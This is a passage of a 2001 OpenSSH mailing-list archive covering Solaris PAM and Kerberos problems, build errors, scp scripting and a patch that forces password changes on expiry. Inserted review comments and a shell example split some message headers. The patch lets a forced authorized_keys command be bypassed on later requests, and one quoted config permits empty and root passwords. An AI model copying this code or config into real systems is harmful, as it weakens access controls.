The system is running with the latest PAM patch 109805-03

Other things of interest are, kinit works fine and in /var/adm/messages I see messages like :

Jun 18 13:08:49 ssh-server sshd[1406]: [ID 390226 user.error] PAM-KRB5:Could not obtain principal name

Also, if I configure things to run with only pam_unix everything works.

Any suggestions would be appreciated.

Thanks.
Shigeki Misawa
RHIC Computing Facility
Brookhaven National Laboratory

From Dean.M.Knape at NJIT.EDU Tue Jun 19 03:58:54 2001
From: Dean.M.Knape at NJIT.EDU (Knape, Dean)
Date: Mon, 18 Jun 2001 13:58:54 -0400
Subject: multiply-defined error during make
Message-ID:

Hello All,

During the make of openssh-2.9 on solaris 5.8 make failed with the following error:

ld: fatal: symbol `des_check_key' is multiply-defined:
	(file /xxx/xxx/solaris/admin/sys/krb4/lib/libdes.a(set_key.o) and file /xxx/xxx/solaris/openssl/lib/libcrypto.a(set_key.o));
ld: fatal: symbol `des_set_odd_parity' is multiply-defined:
	(file /xxx/xxx/solaris/admin/sys/krb4/lib/libdes.a(set_key.o) and file /xxx/xxx/solaris/openssl/lib/libcrypto.a(set_key.o));
ld: fatal: symbol `des_is_weak_key' is multiply-defined:

My configure included the following options:

--prefix=/xxx/xxx/solaris/ssh
--sysconfdir=/etc/ssh
--with-kerberos4=/xxx/xxx/solaris/admin/sys/krb4
--with-afs
--with-ssl-dir=/xxx/xxx/solaris/openssl
--with-tcp-wrappers
--with-pid-dir=/etc/ssh

Any suggestions on how to correct this?

thanks,
dean

From Darren.Moffat at eng.sun.com Tue Jun 19 04:00:15 2001
From: Darren.Moffat at eng.sun.com (Darren Moffat)
Date: Mon, 18 Jun 2001 11:00:15 -0700 (PDT)
Subject: openssh-2.9p2 with PAM and Kerberos 5 on Solaris 8
Message-ID: <200106181800.f5II0wG375254@jurassic.eng.sun.com>

>Has anyone been able to get Openssh-2.9p2 or p1 or Openssh-2.5.2p2 to
>work with the Kerberos 5 PAM on Solaris 8 ? More specifically, I am
>trying to get the system to work with Kerberos 5 only (no pam_unix).

I can confirm that this does NOT work. I think it is a bug, but at the moment I don't know if it is OpenSSH or the pam_krb5 module (I suspect the latter). I'll look into it.

--
Darren J Moffat

From rachit at ensim.com Tue Jun 19 05:45:27 2001
From: rachit at ensim.com (Rachit Siamwalla)
Date: Mon, 18 Jun 2001 12:45:27 -0700
Subject: make scp more script-capable
Message-ID: <9AC41B8C4781464695BB013F106FCA31D2BE46@nasdaq.ms.ensim.com>

I believe changing ssh_config "BatchMode yes" would fix that problem. BatchMode is designed for use in scripts; if a question needs to be asked, it will fail.

-rchit

-----Original Message-----
From: Alexander Kurz [mailto:alexander.kurz at qsc.de]
Sent: Monday, June 18, 2001 7:39 AM
To: openssh-unix-dev at mindrot.org
Subject: make scp more script-capable

Hi,

here's a proposal of a new ssh/scp-feature:

-------------------------------------------------------
please implement a timeout with non-zero error-returncode on
"Are you sure you want to continue connecting (yes/no)?"
-------------------------------------------------------

My situation:
recently I have implemented a cronjob that is using scp.
Due to organizational reasons, the hostname of the remote machine changed.
The problem that came up at this point is that this message came up:

akurz at dev157-34:~ > ssh someuser at somehost.mydomanin.de
The authenticity of host 'someuser at somehost.mydomanin.de' can't be established.
RSA key fingerprint is 00:12:4a:fc:33:80:71:70:4b:bb:e4:9d:16:c7:30:62.
Are you sure you want to continue connecting (yes/no)?

BUT: I did not see the message, because I have discarded it via

scp someuser at somehost.mydomanin.de:~/somefiles* . >/dev/null

So the script hung without complaining.
If there was some timeout-functionality, I could easily check scp's returncode and create a nice error-message.

regards,
Alexander Kurz, akur at qsc.de

From dwd at bell-labs.com Tue Jun 19 06:55:45 2001
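Rachit's suggestion in working form, as an added example that is neither Alexander's cron script nor anything from OpenSSH: a POSIX sh wrapper that runs scp with BatchMode=yes, so an unknown or changed host key (or any other question) fails immediately instead of waiting for an answer that a cron job can never give, and that keeps scp's stderr instead of discarding it, since the ">/dev/null" in the report is what hid the prompt in the first place. StrictHostKeyChecking=yes is assumed to be the right policy for an unattended job (the host must already be in known_hosts); the SCP variable is a hypothetical hook so the function can be exercised without a network.

```sh
#!/bin/sh
# batch_scp SRC DST
# Non-interactive scp for cron jobs: never blocks on a prompt, never loses
# the reason for a failure.
#   BatchMode=yes             ssh asks no questions (passphrase, password,
#                             host-key yes/no); an unanswerable question is
#                             turned into a hard failure instead of a hang
#   StrictHostKeyChecking=yes refuse hosts whose key is not already recorded
#                             in known_hosts, rather than learning it blindly
# SCP is a test hook (assumption for this example): it defaults to scp and can
# be pointed at another command to exercise the error path offline.
batch_scp() {
    src=$1
    dst=$2
    errlog=${TMPDIR:-/tmp}/batch_scp.$$.err

    ${SCP:-scp} -q -o BatchMode=yes -o StrictHostKeyChecking=yes \
        "$src" "$dst" 2>"$errlog"
    rc=$?

    if [ "$rc" -ne 0 ]; then
        # stdout is usually thrown away in cron jobs, so the diagnosis goes
        # to stderr (which cron mails) together with whatever ssh/scp said,
        # e.g. "Host key verification failed." for a new or changed key.
        echo "batch_scp: copying $src to $dst failed (exit status $rc)" >&2
        sed 's/^/batch_scp: scp said: /' "$errlog" >&2
    fi
    rm -f "$errlog"
    return "$rc"
}
```

Usage in a cron entry is simply `batch_scp 'someuser@somehost:~/somefiles*' .`; the job's own exit status is then scp's, so a monitoring wrapper or cron's mail shows the failure rather than a silently hung process.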
From: dwd at bell-labs.com (Dave Dykstra)
Date: Mon, 18 Jun 2001 15:55:45 -0500
Subject: Patch for changing expired passwords
Message-ID: <20010618155545.A5924@lucent.com>

The primary purpose of the attached patches is for portable OpenSSH to support changing expired passwords as specified in shadow password files. To support that, I did a couple enhancements to the base OpenBSD OpenSSH code. They are:

1. Consolidated the handling of "forced_command" into a do_exec() function in session.c. These were being handled inconsistently and allocated memory was not always being properly freed.

2. Added log messages to say why a user is disallowed by allowed_user() in session.c.

Those two changes are in attachment #1, against the current OpenBSD OpenSSH CVS. I hope Markus will accept them.

Attachment #2 contains additional changes against the portable OpenSSH CVS to invoke the 'passwd' command whenever a shadow password entry expires and a pseudo-tty is available. This approach is similar to what was used by SSH 1.2.27, but more robust because 1.2.27 would attempt to change a password when there was no pty and fail (not to mention that it didn't work on Linux at all because the Linux "passwd" command only permits root to pass a username), and 1.2.27 gave no clue to the user as to why it was asking for the password. I decided that the 1.2.27 sshd_config option ForcedPasswdChange was not worth putting in because I can't see why anybody would want to turn it off and always deny expired passwords (as currently happens in OpenSSH); if somebody wants to completely expire an account on a specific date, there's a separate field for that in the shadow password file.

I have tested these changes on Solaris 2.7, Linux 2.4, Irix 6.2, and Unixware 1.1.2. Apply attachment #1 first, then attachment #2 to the current portable OpenSSH CVS.

Attachment #3 is a single patch file for all the changes against OpenSSH_2.9p2 in case anybody else on the list wants to try it.
- Dave Dykstra -------------- next part -------------- *** auth.c.O Mon Jun 18 09:31:58 2001 --- auth.c Mon Jun 18 09:35:08 2001 *************** *** 68,83 **** shell = (pw->pw_shell[0] == '\0') ? _PATH_BSHELL : pw->pw_shell; /* deny if shell does not exists or is not executable */ ! if (stat(shell, &st) != 0) return 0; ! if (!((st.st_mode & S_IFREG) && (st.st_mode & (S_IXOTH|S_IXUSR|S_IXGRP)))) return 0; /* Return false if user is listed in DenyUsers */ if (options.num_deny_users > 0) { for (i = 0; i < options.num_deny_users; i++) ! if (match_pattern(pw->pw_name, options.deny_users[i])) return 0; } /* Return false if AllowUsers isn't empty and user isn't listed there */ if (options.num_allow_users > 0) { --- 68,92 ---- shell = (pw->pw_shell[0] == '\0') ? _PATH_BSHELL : pw->pw_shell; /* deny if shell does not exists or is not executable */ ! if (stat(shell, &st) != 0) { ! log("User %.100s not allowed because shell %.100s does not exist", ! pw->pw_name, shell); return 0; ! } ! if (!((st.st_mode & S_IFREG) && (st.st_mode & (S_IXOTH|S_IXUSR|S_IXGRP)))) { ! log("User %.100s not allowed because shell %.100s is not executable", ! pw->pw_name, shell); return 0; + } /* Return false if user is listed in DenyUsers */ if (options.num_deny_users > 0) { for (i = 0; i < options.num_deny_users; i++) ! if (match_pattern(pw->pw_name, options.deny_users[i])) { ! log("User %.100s not allowed because listed in DenyUsers", ! pw->pw_name); return 0; + } } /* Return false if AllowUsers isn't empty and user isn't listed there */ if (options.num_allow_users > 0) { *************** *** 85,97 **** if (match_pattern(pw->pw_name, options.allow_users[i])) break; /* i < options.num_allow_users iff we break for loop */ ! if (i >= options.num_allow_users) return 0; } if (options.num_deny_groups > 0 || options.num_allow_groups > 0) { /* Get the user's group access list (primary and supplementary) */ ! 
if (ga_init(pw->pw_name, pw->pw_gid) == 0) return 0; /* Return false if one of user's groups is listed in DenyGroups */ if (options.num_deny_groups > 0) --- 94,112 ---- if (match_pattern(pw->pw_name, options.allow_users[i])) break; /* i < options.num_allow_users iff we break for loop */ ! if (i >= options.num_allow_users) { ! log("User %.100s not allowed because not listed in AllowUsers", ! pw->pw_name); return 0; + } } if (options.num_deny_groups > 0 || options.num_allow_groups > 0) { /* Get the user's group access list (primary and supplementary) */ ! if (ga_init(pw->pw_name, pw->pw_gid) == 0) { ! log("User %.100s not allowed because not in any group", ! pw->pw_name); return 0; + } /* Return false if one of user's groups is listed in DenyGroups */ if (options.num_deny_groups > 0) *************** *** 98,103 **** --- 113,120 ---- if (ga_match(options.deny_groups, options.num_deny_groups)) { ga_free(); + log("User %.100s not allowed because a group is listed in DenyGroups", + pw->pw_name); return 0; } /* *************** *** 108,113 **** --- 125,132 ---- if (!ga_match(options.allow_groups, options.num_allow_groups)) { ga_free(); + log("User %.100s not allowed because none of user's group are listed in AllowGroups", + pw->pw_name); return 0; } ga_free(); *** session.c.O Mon Jun 18 13:59:57 2001 --- session.c Mon Jun 18 14:15:29 2001 *************** *** 93,98 **** --- 93,99 ---- void session_close(Session *s); void do_exec_pty(Session *s, const char *command); void do_exec_no_pty(Session *s, const char *command); + void do_exec(Session *s, const char *command); void do_login(Session *s, const char *command); void do_child(Session *s, const char *command); void do_motd(void); *************** *** 270,286 **** command = NULL; packet_integrity_check(plen, 0, type); } ! if (forced_command != NULL) { ! original_command = command; ! command = forced_command; ! debug("Forced command '%.500s'", forced_command); ! } ! if (s->ttyfd != -1) ! do_exec_pty(s, command); ! else ! 
do_exec_no_pty(s, command); ! if (command != NULL) ! xfree(command); session_close(s); return; --- 271,277 ---- command = NULL; packet_integrity_check(plen, 0, type); } ! do_exec(s, command); session_close(s); return; *************** *** 504,509 **** --- 495,529 ---- } } + /* + * This is called to fork and execute a command. If another command is + * to be forced, execute that instead. + */ + void + do_exec(Session *s, const char *command) + { + if (forced_command) { + original_command = command; + command = forced_command; + forced_command = NULL; + debug("Forced command '%.900s'", command); + } + + if (s->ttyfd != -1) + do_exec_pty(s, command); + else + do_exec_no_pty(s, command); + + if (command != NULL) + xfree(command); + + if (original_command != NULL) { + xfree(original_command); + original_command = NULL; + } + } + + /* administrative, login(1)-like work */ void do_login(Session *s, const char *command) *************** *** 1288,1300 **** int session_shell_req(Session *s) { - /* if forced_command == NULL, the shell is execed */ - char *shell = forced_command; packet_done(); ! if (s->ttyfd == -1) ! do_exec_no_pty(s, shell); ! else ! do_exec_pty(s, shell); return 1; } --- 1308,1315 ---- int session_shell_req(Session *s) { packet_done(); ! do_exec(s, NULL); return 1; } *************** *** 1304,1320 **** u_int len; char *command = packet_get_string(&len); packet_done(); ! if (forced_command) { ! original_command = command; ! command = forced_command; ! debug("Forced command '%.500s'", forced_command); ! } ! if (s->ttyfd == -1) ! do_exec_no_pty(s, command); ! else ! do_exec_pty(s, command); ! if (forced_command == NULL) ! xfree(command); return 1; } --- 1319,1325 ---- u_int len; char *command = packet_get_string(&len); packet_done(); ! 
do_exec(s, command); return 1; } -------------- next part -------------- *** auth.c.O2 Mon Jun 18 14:21:06 2001 --- auth.c Mon Jun 18 14:24:33 2001 *************** *** 47,52 **** --- 47,55 ---- #include "buffer.h" #include "bufaux.h" + /* set when password has expired */ + int forced_passwd_change = 0; + /* import */ extern ServerOptions options; *************** *** 81,93 **** int days = time(NULL) / 86400; /* Check account expiry */ ! if ((spw->sp_expire >= 0) && (days > spw->sp_expire)) return 0; /* Check password expiry */ if ((spw->sp_lstchg >= 0) && (spw->sp_max >= 0) && ! (days > (spw->sp_lstchg + spw->sp_max))) ! return 0; } #else /* Shouldn't be called if pw is NULL, but better safe than sorry... */ --- 84,106 ---- int days = time(NULL) / 86400; /* Check account expiry */ ! if ((spw->sp_expire >= 0) && (days > spw->sp_expire)) { ! log("User %.100s not allowed because account expired", ! pw->pw_name); return 0; + } /* Check password expiry */ if ((spw->sp_lstchg >= 0) && (spw->sp_max >= 0) && ! (days > (spw->sp_lstchg + spw->sp_max))) { ! if ((pw->pw_uid == 0)) { ! log("User %.100s not allowed because password expired", ! pw->pw_name); ! return 0; ! } ! ! forced_passwd_change = 1; ! } } #else /* Shouldn't be called if pw is NULL, but better safe than sorry... */ *************** *** 177,183 **** } /* Remove trailing newline */ *--p = '\0'; ! log("Login restricted for %s: %.100s", pw->pw_name, loginmsg); } return 0; } --- 190,196 ---- } /* Remove trailing newline */ *--p = '\0'; ! 
log("Login restricted for %.100s: %.100s", pw->pw_name, loginmsg); } return 0; } *** auth.h.O Tue Jun 5 15:25:06 2001 --- auth.h Mon Jun 18 14:28:04 2001 *************** *** 35,40 **** --- 35,43 ---- #include #endif + /* set when password has expired */ + extern int forced_passwd_change; + typedef struct Authctxt Authctxt; typedef struct KbdintDevice KbdintDevice; *** session.c.O2 Mon Jun 18 14:21:15 2001 --- session.c Mon Jun 18 14:39:36 2001 *************** *** 603,608 **** --- 603,636 ---- debug("Forced command '%.900s'", command); } + if (forced_passwd_change) { + char *user = s->pw->pw_name; + char *msg; + + if (command != NULL) + xfree(command); + + if (s->ttyfd != -1) { + msg = "Password for %.100s has expired, running 'passwd' to reset it"; + /* + * Can't pass "user" to 'passwd' because Linux doesn't + * allow it. + * Also, the prompt is friendlier without "user". + */ + command = xstrdup(PASSWD_PATH); + } else { + msg = "Password for %.100s has expired and cannot be changed without a pty"; + /* + * Without a pty, Solaris 'passwd' prints "Permission + * denied", but Linux attempts to change the password + * and fails miserably, so echo an error message instead + */ + command = xstrdup("/bin/sh -c 'echo Permission denied >&2; exit 1'"); + } + log(msg, user); + packet_send_debug(msg, user); + } + if (s->ttyfd != -1) do_exec_pty(s, command); else *** configure.in.O Sun Jun 10 12:24:52 2001 --- configure.in Mon Jun 18 14:27:23 2001 *************** *** 1304,1309 **** --- 1304,1313 ---- AC_DEFINE_UNQUOTED(RSH_PATH, "$rsh_path") fi + AC_PATH_PROG(PASSWD_PATH, passwd) + AC_DEFINE_UNQUOTED(PASSWD_PATH, "$PASSWD_PATH") + + # Check for mail directory (last resort if we cannot get it from headers) if test ! 
-z "$MAIL" ; then maildir=`dirname $MAIL` *** acconfig.h.O Tue May 8 15:33:06 2001 --- acconfig.h Mon Jun 18 14:30:16 2001 *************** *** 211,216 **** --- 211,219 ---- /* Define if rsh is found in your path */ #undef RSH_PATH + /* Define if passwd is found in your path */ + #undef PASSWD_PATH + /* Define if you want to allow MD5 passwords */ #undef HAVE_MD5_PASSWORDS -------------- next part -------------- *** auth.c.O Mon Jun 18 14:50:25 2001 --- auth.c Mon Jun 18 14:50:29 2001 *************** *** 41,46 **** --- 41,49 ---- #include "auth-options.h" #include "canohost.h" + /* set when password has expired */ + int forced_passwd_change = 0; + /* import */ extern ServerOptions options; *************** *** 75,87 **** int days = time(NULL) / 86400; /* Check account expiry */ ! if ((spw->sp_expire >= 0) && (days > spw->sp_expire)) return 0; /* Check password expiry */ if ((spw->sp_lstchg >= 0) && (spw->sp_max >= 0) && ! (days > (spw->sp_lstchg + spw->sp_max))) ! return 0; } #else /* Shouldn't be called if pw is NULL, but better safe than sorry... */ --- 78,100 ---- int days = time(NULL) / 86400; /* Check account expiry */ ! if ((spw->sp_expire >= 0) && (days > spw->sp_expire)) { ! log("User %.100s not allowed because account expired", ! pw->pw_name); return 0; + } /* Check password expiry */ if ((spw->sp_lstchg >= 0) && (spw->sp_max >= 0) && ! (days > (spw->sp_lstchg + spw->sp_max))) { ! if ((pw->pw_uid == 0)) { ! log("User %.100s not allowed because password expired", ! pw->pw_name); ! return 0; ! } ! ! forced_passwd_change = 1; ! } } #else /* Shouldn't be called if pw is NULL, but better safe than sorry... */ *************** *** 96,111 **** shell = (pw->pw_shell[0] == '\0') ? _PATH_BSHELL : pw->pw_shell; /* deny if shell does not exists or is not executable */ ! if (stat(shell, &st) != 0) return 0; ! 
if (!((st.st_mode & S_IFREG) && (st.st_mode & (S_IXOTH|S_IXUSR|S_IXGRP)))) return 0; /* Return false if user is listed in DenyUsers */ if (options.num_deny_users > 0) { for (i = 0; i < options.num_deny_users; i++) ! if (match_pattern(pw->pw_name, options.deny_users[i])) return 0; } /* Return false if AllowUsers isn't empty and user isn't listed there */ if (options.num_allow_users > 0) { --- 109,133 ---- shell = (pw->pw_shell[0] == '\0') ? _PATH_BSHELL : pw->pw_shell; /* deny if shell does not exists or is not executable */ ! if (stat(shell, &st) != 0) { ! log("User %.100s not allowed because shell %.100s does not exist", ! pw->pw_name, shell); return 0; ! } ! if (!((st.st_mode & S_IFREG) && (st.st_mode & (S_IXOTH|S_IXUSR|S_IXGRP)))) { ! log("User %.100s not allowed because shell %.100s is not executable", ! pw->pw_name, shell); return 0; + } /* Return false if user is listed in DenyUsers */ if (options.num_deny_users > 0) { for (i = 0; i < options.num_deny_users; i++) ! if (match_pattern(pw->pw_name, options.deny_users[i])) { ! log("User %.100s not allowed because listed in DenyUsers", ! pw->pw_name); return 0; + } } /* Return false if AllowUsers isn't empty and user isn't listed there */ if (options.num_allow_users > 0) { *************** *** 113,125 **** if (match_pattern(pw->pw_name, options.allow_users[i])) break; /* i < options.num_allow_users iff we break for loop */ ! if (i >= options.num_allow_users) return 0; } if (options.num_deny_groups > 0 || options.num_allow_groups > 0) { /* Get the user's group access list (primary and supplementary) */ ! if (ga_init(pw->pw_name, pw->pw_gid) == 0) return 0; /* Return false if one of user's groups is listed in DenyGroups */ if (options.num_deny_groups > 0) --- 135,153 ---- if (match_pattern(pw->pw_name, options.allow_users[i])) break; /* i < options.num_allow_users iff we break for loop */ ! if (i >= options.num_allow_users) { ! log("User %.100s not allowed because not listed in AllowUsers", ! 
pw->pw_name); return 0; + } } if (options.num_deny_groups > 0 || options.num_allow_groups > 0) { /* Get the user's group access list (primary and supplementary) */ ! if (ga_init(pw->pw_name, pw->pw_gid) == 0) { ! log("User %.100s not allowed because not in any group", ! pw->pw_name); return 0; + } /* Return false if one of user's groups is listed in DenyGroups */ if (options.num_deny_groups > 0) *************** *** 126,131 **** --- 154,161 ---- if (ga_match(options.deny_groups, options.num_deny_groups)) { ga_free(); + log("User %.100s not allowed because a group is listed in DenyGroups", + pw->pw_name); return 0; } /* *************** *** 136,141 **** --- 166,173 ---- if (!ga_match(options.allow_groups, options.num_allow_groups)) { ga_free(); + log("User %.100s not allowed because none of user's group are listed in AllowGroups", + pw->pw_name); return 0; } ga_free(); *************** *** 152,158 **** } /* Remove trailing newline */ *--p = '\0'; ! log("Login restricted for %s: %.100s", pw->pw_name, loginmsg); } return 0; } --- 184,190 ---- } /* Remove trailing newline */ *--p = '\0'; ! log("Login restricted for %.100s: %.100s", pw->pw_name, loginmsg); } return 0; } *** auth.h.O Mon Jun 18 14:50:25 2001 --- auth.h Mon Jun 18 14:50:29 2001 *************** *** 35,40 **** --- 35,43 ---- #include #endif + /* set when password has expired */ + extern int forced_passwd_change; + typedef struct Authctxt Authctxt; struct Authctxt { int success; *** session.c.O Mon Jun 18 14:50:25 2001 --- session.c Mon Jun 18 14:50:29 2001 *************** *** 126,131 **** --- 126,132 ---- void session_proctitle(Session *s); void do_exec_pty(Session *s, const char *command); void do_exec_no_pty(Session *s, const char *command); + void do_exec(Session *s, const char *command); void do_login(Session *s, const char *command); #ifdef LOGIN_NEEDS_UTMPX void do_pre_login(Session *s); *************** *** 394,411 **** command = NULL; packet_integrity_check(plen, 0, type); } ! 
if (forced_command != NULL) { ! original_command = command; ! command = forced_command; ! debug("Forced command '%.500s'", forced_command); ! } ! if (have_pty) ! do_exec_pty(s, command); ! else ! do_exec_no_pty(s, command); ! ! if (command != NULL) ! xfree(command); return; default: --- 395,401 ---- command = NULL; packet_integrity_check(plen, 0, type); } ! do_exec(s, command); return; default: *************** *** 680,685 **** --- 670,732 ---- } #endif + /* + * This is called to fork and execute a command. If another command is + * to be forced, execute that instead. + */ + void + do_exec(Session *s, const char *command) + { + if (forced_command) { + original_command = command; + command = forced_command; + forced_command = NULL; + debug("Forced command '%.900s'", command); + } + + if (forced_passwd_change) { + char *user = s->pw->pw_name; + char *msg; + + if (command != NULL) + xfree(command); + + if (s->ttyfd != -1) { + msg = "Password for %.100s has expired, running 'passwd' to reset it"; + /* + * Can't pass "user" to 'passwd' because Linux doesn't + * allow it. + * Also, the prompt is friendlier without "user". 
+ */ + command = xstrdup(PASSWD_PATH); + } else { + msg = "Password for %.100s has expired and cannot be changed without a pty"; + /* + * Without a pty, Solaris 'passwd' prints "Permission + * denied", but Linux attempts to change the password + * and fails miserably, so echo an error message instead + */ + command = xstrdup("/bin/sh -c 'echo Permission denied >&2; exit 1'"); + } + log(msg, user); + packet_send_debug(msg, user); + } + + if (s->ttyfd != -1) + do_exec_pty(s, command); + else + do_exec_no_pty(s, command); + + if (command != NULL) + xfree(command); + + if (original_command != NULL) { + xfree(original_command); + original_command = NULL; + } + } + + /* administrative, login(1)-like work */ void do_login(Session *s, const char *command) *************** *** 1737,1749 **** int session_shell_req(Session *s) { - /* if forced_command == NULL, the shell is execed */ - char *shell = forced_command; packet_done(); ! if (s->ttyfd == -1) ! do_exec_no_pty(s, shell); ! else ! do_exec_pty(s, shell); return 1; } --- 1784,1791 ---- int session_shell_req(Session *s) { packet_done(); ! do_exec(s, NULL); return 1; } *************** *** 1753,1769 **** u_int len; char *command = packet_get_string(&len); packet_done(); ! if (forced_command) { ! original_command = command; ! command = forced_command; ! debug("Forced command '%.500s'", forced_command); ! } ! if (s->ttyfd == -1) ! do_exec_no_pty(s, command); ! else ! do_exec_pty(s, command); ! if (forced_command == NULL) ! xfree(command); return 1; } --- 1795,1801 ---- u_int len; char *command = packet_get_string(&len); packet_done(); ! do_exec(s, command); return 1; } *** configure.in.O Mon Jun 18 14:50:25 2001 --- configure.in Mon Jun 18 14:50:29 2001 *************** *** 1302,1307 **** --- 1302,1311 ---- AC_DEFINE_UNQUOTED(RSH_PATH, "$rsh_path") fi + AC_PATH_PROG(PASSWD_PATH, passwd) + AC_DEFINE_UNQUOTED(PASSWD_PATH, "$PASSWD_PATH") + + # Check for mail directory (last resort if we cannot get it from headers) if test ! 
-z "$MAIL" ; then maildir=`dirname $MAIL` *** acconfig.h.O Mon Jun 18 14:50:25 2001 --- acconfig.h Mon Jun 18 14:50:31 2001 *************** *** 211,216 **** --- 211,219 ---- /* Define if rsh is found in your path */ #undef RSH_PATH + /* Define if passwd is found in your path */ + #undef PASSWD_PATH + /* Define if you want to allow MD5 passwords */ #undef HAVE_MD5_PASSWORDS From Ernst.Boetsch at lrz-muenchen.de Tue Jun 19 07:56:25 2001 
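Review bot: in the new do_exec() (the session.c hunk that adds it, in attachment #1 and again in the OpenSSH_2.9p2 patch), `forced_command = NULL;` followed by the unconditional `if (command != NULL) xfree(command);` consumes the forced command on the first exec, so any later shell or exec request on the same connection (protocol 2 allows several session channels) enters do_exec() with forced_command unset and runs the client-supplied command instead. The code being replaced kept forced_command intact and freed only the client's string (`if (forced_command == NULL) xfree(command);`). Suggest leaving forced_command alone for the life of the connection and freeing only what do_exec() itself allocated. Separately, `command` is declared `const char *` yet is reassigned and handed to xfree(); drop the const qualifier so the ownership transfer is visible to the reader.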
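Review bot: the forced_passwd_change branch in do_exec() (attachment #2 session.c hunk, and the combined hunk in the 2.9p2 patch) runs after the forced_command substitution and discards `command` with xfree(), so a key restricted by an authorized_keys `command="..."` option gets an interactive `passwd` session, or the substitute `/bin/sh -c 'echo Permission denied >&2; exit 1'`, once the account's shadow entry expires, and the restricted command never runs. Please say whether that is intended; if not, skip the forced change when a forced command is in effect. Also worth a comment: `log(msg, user);` and `packet_send_debug(msg, user);` take `msg` as the format string, which is safe only because both possible values are string literals in this function.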
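Review bot: in the auth.c password-expiry hunk, `if ((pw->pw_uid == 0))` carries a redundant pair of parentheses, and the behaviour change deserves a comment at the `forced_passwd_change = 1;` site: allowed_user() used to refuse an expired password outright and now admits every non-root user on the assumption that do_exec() will force `passwd`, so anyone touching allowed_user() later needs to know the two are coupled. The flag is also only ever set, never cleared; if allowed_user() can be called more than once per connection (for a different user name, say), reset it at the top of the function so a rejected earlier attempt cannot leave it set for the user who finally authenticates.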
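Review bot: the configure.in hunk defines PASSWD_PATH unconditionally; AC_PATH_PROG leaves $PASSWD_PATH empty when no passwd binary is on the build host's PATH, so sshd would be built with PASSWD_PATH "" and do_exec() would xstrdup("") as the command for an expired password. Guard it the way the rsh probe just above is guarded (the `fi` in the context line closes a test on $rsh_path), either failing configure or falling back to a fixed path, and note in the acconfig.h comment that the value is whatever the build machine had in PATH, which may not match the target system.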
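Review bot: in the AllowGroups hunk of auth.c, the message "User %.100s not allowed because none of user's group are listed in AllowGroups" should read "none of user's groups are listed in AllowGroups"; the other new allowed_user() messages are fine. Since these lines are what an administrator will grep for in syslog, it is worth getting the wording settled before they ship.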
From: Ernst.Boetsch at lrz-muenchen.de (Ernst Boetsch)
Date: Mon, 18 Jun 2001 23:56:25 +0200
Subject: OpenSSH + Solaris + AFS ???
Message-ID: <20010618235625.A21297@wsc33.lrz-muenchen.de>

Hello *,

sorry if I missed an article which already solves my problem.

I need a working configuration of OpenSSH for Solaris 7 (SunOS 5.7) with AFS support. PAM support to use the AFS PAM module `pam_afs.so' and TCP-Wrapper support would be nice. It would be nice to have similar configurations for Solaris 6 (SunOS 5.6), Solaris 8 (SunOS 5.8) and Solaris 2.5.1.

I have tested a few configurations but none worked. The last one was:

* openssh-2.9p1, krb4-1.0.8, openssl-0.9.6a, zlib-1.1.3, AFS 3.5 (?), cc (Sun WorkShop 6 update 1), SunOS 5.7

* Static libraries of `krb4-1.0.8' and `openssl-0.9.6a'

* OpenSSH has been configured with the following options:

  User binaries: /sw/sun4_57/Security/openssh-2.9p1
  System binaries: /sw/sun4_57/Security/openssh-2.9p1
  Configuration files: /usr/local/etc/openssh
  Askpass program: /sw/sun4_57/Security/openssh-2.9p1/ssh-askpass
  Manual pages: /sw/sun4_57/Security/openssh-2.9p1/man/manX
  PID file: /usr/local/etc/openssh
  sshd default user PATH: /usr/bin:/usr/ucb:/usr/local/bin:/client/bin
  Random number collection: Builtin (timeout 200)
  Manpage format: man
  PAM support: yes
  KerberosIV support: yes
  AFS support: yes
  S/KEY support: no
  TCP Wrappers support: yes
  MD5 password support: no
  IP address in $DISPLAY hack: no
  Use IPv4 by default hack: yes
  Translate v4 in v6 hack: no

  Host: sparc-sun-solaris2.7
  Compiler: /opt/SUNWspro.6/bin/cc
  Compiler flags: -g
  Preprocessor flags: -I/client/include -I/client/include -I/usr/local/include -I/usr/afsws/include
  Linker flags: -R/client/lib -L/client/lib -z muldefs -L/client/lib -R/client/lib -L/usr/local/lib -R/usr/local/lib -L/usr/afsws/lib
  Libraries: -lkafs -lresolv -ldes -lkrb -lpam -ldl -lwrap -lz -lsocket -lnsl -lgen -lcrypto -ldes

* /etc/pam.conf:

  sshd auth sufficient /usr/lib/security/pam_afs.so ignore_root
  sshd auth required /usr/lib/security/pam_unix.so try_first_pass debug
  sshd account sufficient /usr/lib/security/pam_afs.so.1 ignore_root
  sshd account required /usr/lib/security/pam_unix.so.1 try_first_pass debug
  other session required /usr/lib/security/pam_unix.so.1

* tcpd/allow:

  sshd:.lrz-muenchen.de:rfc931
  sshdfwd-X11:.lrz-muenchen.de:rfc931

* sshd.cf:

  Port 222
  ListenAddress 0.0.0.0
  HostKey /usr/local/etc/openssh/host_key
  ServerKeyBits 768
  LoginGraceTime 600
  KeyRegenerationInterval 3600
  PermitRootLogin yes
  IgnoreRhosts no
  StrictModes yes
  X11Forwarding yes
  X11DisplayOffset 10
  PrintMotd yes
  KeepAlive yes
  SyslogFacility AUTH
  RhostsAuthentication no
  RhostsRSAAuthentication yes
  RSAAuthentication yes
  PasswordAuthentication yes
  PermitEmptyPasswords yes
  UseLogin no
  KerberosAuthentication yes
  KerberosOrLocalPasswd no
  KerberosTgtPassing yes
  AFSTokenPassing yes
  KerberosTicketCleanup yes
  XAuthLocation /usr/openwin/bin/xauth

* Log of `ssh -v -p 222 suntest2' and `sshd -d -d -d' if `.shosts' permits login without password as attachments (files `ssh.log.with-shosts' and `sshd.log.with-shosts')

* Log of `ssh -v -p 222 suntest2' and `sshd -d -d -d' if `.shosts' does not permit login without password as attachments (files `ssh.log.without-shosts' and `sshd.log.without-shosts')

Do you need any other information?
Any hints are appreciated very much.
Thank You for Your cooperation.

Kind regards,
Ernst Boetsch

--
*******************************************************************
Ernst N. Boetsch                        | Leibniz Computer Center
                                        | of the Bavarian Academy
Email: Ernst.Boetsch at lrz-muenchen.de    | of Sciences
Phone: +49 89 289-28831 (/-28784)       | Barer Strasse 21
Fax:   +49 89 2809460                   | D-80333 Muenchen, Germany

-------------- next part --------------
$ ssh -v -p 222 suntest2
SSH Version 1.2.27 (AFS/KRB.p1, LRZ) [sparc-sun-solaris2.5.1], protocol version 1.5.
Standard version.  Does not use RSAREF.
